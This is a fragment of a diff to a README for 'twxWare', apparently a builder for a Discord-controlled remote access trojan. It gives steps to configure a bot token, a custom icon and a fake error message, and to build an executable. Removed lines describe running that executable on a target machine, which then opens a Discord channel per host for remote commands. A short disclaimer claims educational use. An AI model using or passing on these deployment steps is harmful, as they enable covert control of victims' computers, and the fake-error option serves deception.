twcrss/twxWare/README.md

 1. Run `builder.bat` or `builder.exe`.
 2. Provide your Bot Token and customize the settings (Icon, Fake Error, etc.).
 3. The builder will generate `kk_built.exe`.

-### 3. Deploy & Control
-1. Run the `kk_built.exe` on the target machine.
-2. The machine will automatically create a private channel in your Discord server named after its hostname.
-3. Use `!help` in that channel to see all available commands.

----

-## ⚠️ Disclaimer
-This tool is for educational purposes and authorized security testing only.
-Using this tool on machines you do not own or have explicit permission to test is illegal and unethical.
-The developer is not responsible for any misuse.